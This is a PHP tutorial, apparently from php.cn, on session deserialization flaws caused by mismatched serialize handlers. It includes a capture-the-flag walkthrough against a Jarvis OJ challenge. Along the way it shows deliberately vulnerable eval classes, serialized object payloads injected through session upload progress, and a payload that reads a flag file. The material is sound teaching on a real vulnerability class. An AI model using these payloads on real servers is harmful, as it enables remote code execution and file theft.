Artikel ini membawakan anda pengetahuan yang berkaitan tentang PHP, yang terutamanya memperkenalkan isu yang berkaitan dengan kerentanan penyahserikatan sesi, iaitu, mensiri dan menyimpan data Sesi serta menyahsiri dan membaca Sesi Kaedah data yang berbeza membawa kepada kelemahan penyahserikatan Sesi. Saya harap ia akan membantu semua orang.
!["Pengenalan]("https://img.php.cn/upload/article/000/000/067/626618d4b21b3658.jpg")
Kajian yang disyorkan: "Tutorial Video PHP"
Kerentanan deserialisasi sesi PHP
PHP session kerentanan penyahserikatan berlaku apabila kaedah [mensiri dan menyimpan Session data] dan [menyahserialisasi dan membaca Session data] adalah berbeza, mengakibatkan session kerentanan penyahserilan
Apakah itu sesi
RasmiSessionDefinisi: Dalam komputer, terutamanya dalam aplikasi rangkaian, ia dipanggil "kawalan sesi". Session Objek menyimpan sifat dan maklumat konfigurasi yang diperlukan untuk sesi pengguna tertentu. Ciri-ciri utama adalah seperti berikut:
-
sessionLokasi yang disimpan adalah di sebelah pelayan
-
sessionBiasanya digunakan bersama dengan cookie
Kerana sifat HTTP tanpa kewarganegaraan, pelayan menjana session untuk mengenal pasti status pengguna semasa
Pada asasnya, session ialah teknologi storan data yang boleh mengekalkan bahagian pelayan. Iaitu, **session teknologi ialah teknologi yang menyimpan data sementara berdasarkan bahagian belakang yang berbeza daripada pangkalan data**
aliran kerja sesi PHP
Ambil PHP sebagai contoh untuk memahami session Prinsip
- Apabila skrip PHP menggunakan session_start() untuk membuka sesi
session, ia akan mengesan PHPSESSID secara automatik
- Jika
Cookie wujud, dapatkan PHPSESSID
- Jika
Cookie tidak wujud, buat PHPSESSID dan simpan ke penyemak imbas dalam bentuk Cookie melalui pengepala respons
- Mulakan pembolehubah superglobal
$_SESSION kepada tatasusunan kosong
- PHP menggunakan
PHPSESSID untuk menentukan lokasi (PHPSESSID lokasi storan fail) untuk dipadankan fail yang sepadan
- Fail wujud: baca kandungan fail (melalui penyahserialisasian) dan simpan data dalam
$_SESSION
- Fail tidak wujud: session_start() mencipta
PHPSESSID bernama fail
- Pelaksanaan program tamat, dan semua data yang disimpan dalam
$_SESSION akan disiri dan disimpan dalam fail yang sepadan PHPSESSID
Terperinci rajah skematik:
![""]("https://img.php.cn/upload/article/000/000/067/be69afd137ffe0e5382767c78090c8c8-0.png")
konfigurasi sesi php.ini
php.ini mengandungi item konfigurasi session yang lebih penting
session.save_path="/tmp" --设置session文件的存储位置
session.save_handler=files --设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0 --指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用php
session.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
Salin selepas log masuk
Mekanisme jujukan sesi PHP
Menurut item konfigurasi dalam php.ini, kami mengkaji tiga format pemprosesan berbeza yang digunakan untuk mensiri dan menyimpan semua data yang disimpan dalam $_SESSION ke dalam fail yang sepadan dengan PHPSESSID, iaitu Tiga enjin ditakrifkan oleh session.serialize_handler:
| 处理器 |
对应的存储格式 |
| php |
键名 + 竖线 + 经过 serialize() 函数反序列处理的值 |
| php_binary |
键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 |
| php_serialize (php>=5.5.4) |
经过 serialize() 函数反序列处理的数组 |
pemproses php
Mula-mula, mari kita lihat hasil bersiri pada masa lalai session.serialize_handler = php Kodnya adalah seperti berikut
<?php//ini_set('session.serialize_handler','php');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>
Salin selepas log masuk
![""]("https://img.php.cn/upload/article/000/000/067/3c151738f42612b2f76084edf84190b8-17.png")
Untuk memudahkan tontonan, tetapkan session direktori storan kepada session.save_path = "/www/php_session" dan PHPSESSID fail adalah seperti berikut
![""]("https://img.php.cn/upload/article/000/000/067/3c151738f42612b2f76084edf84190b8-18.png")
1. Fail Nama fail
dinamakan sess_mpnnbont606f50eb178na451od, dengan mpnnbont606f50eb178na451od ialah nilai Cookie yang dibawa oleh PHPSESSID dalam pengepala permintaan berikutnya (seperti yang disimpan dalam pelayar di atas)
2. Kandungan fail
format storan pemproses php
| 键名 |
竖线 |
经过 serialize() 函数反序列处理的值 |
| $_SESSION[‘name’]的键名:name |
| |
s:6:“harden”; |
php_binary处理器
使用php_binary处理器,即session.serialize_handler = php_binary
<?phpini_set('session.serialize_handler','php_binary');session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];echo $_SESSION['namenamenamenamenamenamenamenamename'];?>
Salin selepas log masuk
由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容
![""]("https://img.php.cn/upload/article/000/000/067/9191719f400e2791365d8162f0327e21-19.png")
| 键名的长度对应的 ASCII 字符 |
键名 |
经过 serialize() 函数反序列处理的值. |
| $ |
namenamenamenamenamenamenamenamename |
s:6:“harden”; |
php_serialize 处理器
使用php_binary处理器,即session.serialize_handler = php_serialize
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['name'] = $_GET['name'];echo $_SESSION['name'];?>
Salin selepas log masuk
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}
![""]("https://img.php.cn/upload/article/000/000/067/9191719f400e2791365d8162f0327e21-20.png")
session的反序列化漏洞利用
session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建session.php,使用php_serialize处理器来存储session数据
<?phpini_set('session.serialize_handler','php_serialize');session_start();$_SESSION['session'] = $_GET['session'];echo $_SESSION['session'];?>
Salin selepas log masuk
test.php,使用默认php处理器来存储session数据
<?phpsession_start();class f4ke{
public $name;
function __wakeup(){
echo "Who are you?";
}
function __destruct(){
eval($this->name);
}}$str = new f4ke();?>Salin selepas log masuk
接着,我们构建URL进行访问session.php:
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}Salin selepas log masuk
![""]("https://img.php.cn/upload/article/000/000/067/9bd244c27bed149d80a26103d1c781c3-21.png")
打开PHPSESSID文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}Salin selepas log masuk
![""]("https://img.php.cn/upload/article/000/000/067/9bd244c27bed149d80a26103d1c781c3-22.png")
漏洞分析:
在session.php程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}通过php_serialize处理器序列化保存成PHPSESSID文件;
由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.php,session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即
| 键名 |
竖线 |
经过 serialize() 函数反序列处理的值 |
| a:1:{s:7:“session”;s:45:" |
| |
O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;} |
php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:
$_SESSION['session'] = new f4ke();$_SESSION['session']->name = 'phpinfo();';
Salin selepas log masuk
我们访问test.php,即可直接执行phpinfo()函数
![""]("https://img.php.cn/upload/article/000/000/067/9bd244c27bed149d80a26103d1c781c3-23.png")
CTF例题:PHPINFO
<?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}}if(isset($_GET['phpinfo'])){
$m = new OowoO();}else{
highlight_string(file_get_contents('index.php'));}?>Salin selepas log masuk
我们可以看到ini_set('session.serialize_handler', 'php'),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置
![""]("https://img.php.cn/upload/article/000/000/067/7d762ee1eb236a8601253176edeb4fbe-24.png")
可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize
Salin selepas log masuk
那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点
补充知识
当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件
![""]("https://img.php.cn/upload/article/000/000/067/7d762ee1eb236a8601253176edeb4fbe-25.png")
下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /> <input type="file" name="file1" />
<input type="file" name="file2" />
<input type="submit" /></form>Salin selepas log masuk
其中name=""也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"
在session中存储的上传进度,如下所示:
<?php$_SESSION["upload_progress_123"] = array(
"start_time" => 1234567890, // The request time 请求时间
"content_length" => 57343257, // POST content length 长度
"bytes_processed" => 453489, // Amount of bytes received and processed 已接收字节
"done" => false, // true when the POST handler has finished, successfully or not 是否上传完成
"files" => array(//上传的文件
0 => array(
"field_name" => "file1", // Name of the <input/> field input中设定的变量名
// The following 3 elements equals those in $_FILES
"name" => "foo.avi", //文件名
"tmp_name" => "/tmp/phpxxxxxx",
"error" => 0,
"done" => true, // True when the POST handler has finished handling this file
"start_time" => 1234567890, // When this file has started to be processed
"bytes_processed" => 57343250, // Amount of bytes received and processed for this file
),
// An other file, not finished uploading, in the same request
1 => array(
"field_name" => "file2",
"name" => "bar.avi",
"tmp_name" => NULL,
"error" => 0,
"done" => false,
"start_time" => 1234567899,
"bytes_processed" => 54554,
),
));
Salin selepas log masuk
其中,session中的field_name和name都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置
![""]("https://img.php.cn/upload/article/000/000/067/c4184df222688c2489e185a48ede1d8a-26.png")
session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off --表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
Salin selepas log masuk
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件
构造POST表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" /></form>
Salin selepas log masuk
构造序列化字符串作为payload(利用代码)
<?phpclass OowoO{
public $mdzz='print_r(scandir(dirname(__FILE__)));';}$obj = new OowoO();echo serialize($obj);?>//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}Salin selepas log masuk
为了防止"被转义,我们在payload中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包
![""]("https://img.php.cn/upload/article/000/000/067/c4184df222688c2489e185a48ede1d8a-27.png")
并修改filename值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}Salin selepas log masuk
发送请求包,代码执行过程分析:
![""]("https://img.php.cn/upload/article/000/000/067/4c87ef28dc688aa92eab5be32bb47e3c-28.png")
因此直接执行print_r(scandir(dirname(__FILE__)));并返回
![""]("https://img.php.cn/upload/article/000/000/067/b6cc5a097271c0572805d44fba6e408b-13.png")
phpinfo查看当前目录,/opt/lampp/htdocs/
![""]("https://img.php.cn/upload/article/000/000/067/33cf746dd0ab368400d8c8c838f51407-30.png")
构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}Salin selepas log masuk
![""]("https://img.php.cn/upload/article/000/000/067/33cf746dd0ab368400d8c8c838f51407-31.png")
推荐学习:《PHP视频教程》
Atas ialah kandungan terperinci Pengenalan terperinci kepada kelemahan penyahserialisasian sesi PHP. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
![Tutorial Komposer PHP [Bina rangka kerja pembangunan PHP anda sendiri]](https://img.php.cn/upload/course/000/000/041/61e7b13f39314635.jpg)
![[Web front-end] Permulaan pantas Node.js](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
